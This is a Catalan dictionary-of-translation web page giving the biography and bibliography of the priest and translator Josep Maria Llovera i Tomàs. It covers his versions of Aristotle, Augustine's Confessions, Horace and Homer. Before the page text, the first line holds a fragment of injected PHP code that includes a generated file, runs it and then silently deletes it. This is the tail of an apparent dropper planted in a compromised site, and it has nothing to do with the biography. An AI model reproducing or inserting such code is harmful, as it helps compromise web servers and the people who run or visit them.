");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Llovera i Tomàs, Josep Maria
Facebook Twitter
Portada > Diccionari de la traducció catalana > Llovera i Tomàs, Josep Maria
Llovera i Tomàs, Josep Maria (Castelló d’Empúries, 1874 – Barcelona, 1949). Prevere, sociòleg i escriptor. Després d’estudiar al seminari de Girona, ingressà en l’orde dels carmelites; acabà els estudis a Roma, on es doctorà. El 1909 l’Acció Social Popular de Barcelona li premià el Tratado de sociología cristiana, una obra que va tenir al llarg de la primera meitat del segle xx una gran difusió a Espanya i Amèrica, amb múltiples edicions. El 1914 passà al clericat secular. Canonge de Barcelona des de 1919; professor de sociologia del seminari, participà en els moviments polítics i socials de la democràcia cristiana i col·laborà en la revista Catalunya Social. Amb Lluís Carreras es féu càrrec de la versió catalana de la Sinopsi evangèlica, primera obra editada per la Fundació Bíblica Catalana, que conté el text grec dels evangelis preparat pel pare Marie-Joseph Lagrange, fundador i director de l’École Biblique de Jerusalem. Aquesta versió s’incorporà en els dos volums dels Evangelis de la Bíblia de la Fundació (el 1931 i el 1933). Traduí igualment els himnes litúrgics (publicats de manera esparsa en diverses revistes a partir de 1926 i, complets, el 1994 en l’Himnari litúrgic), Categories i Perihermeneias d’Aristòtil i les Confessions de sant Agustí. D’aquesta darrera obra cal fer esment de la nota proemial, on exposa les dificultats i els criteris de traducció d’un text clàssic i fa una anàlisi de les versions de les Confessions existents en les diverses llengües actuals. També traslladà, per primera vegada al català, l’obra completa d’Horaci en els seus metres originals i quinze rapsòdies de la Ilíada d’Homer. Revisà el primer volum dels Discursos de Ciceró (1923) de la Fundació Bernat Metge, traduïts per Llorenç Riber. [Joan Naspleda]
ARISTÒTIL. Categories i Perihermeneias. Barcelona: Altés, 1929.
AGUSTÍ, Sant. Confessions. Barcelona: Lluís Gili, 1931.
LLOVERA, Josep M.. Versions de l’obra completa d’Horaci i de quinze rapsòdies de la Ilíada d’Homer. Sabadell: Acadèmia Catòlica, 1975.
Sinopsi evangèlica. Barcelona: Alpha, 1927. [Amb Lluís Carreras]
Himnari litúrgic complet llatí-català. Barcelona: Claret, 1994.
Amb el suport de: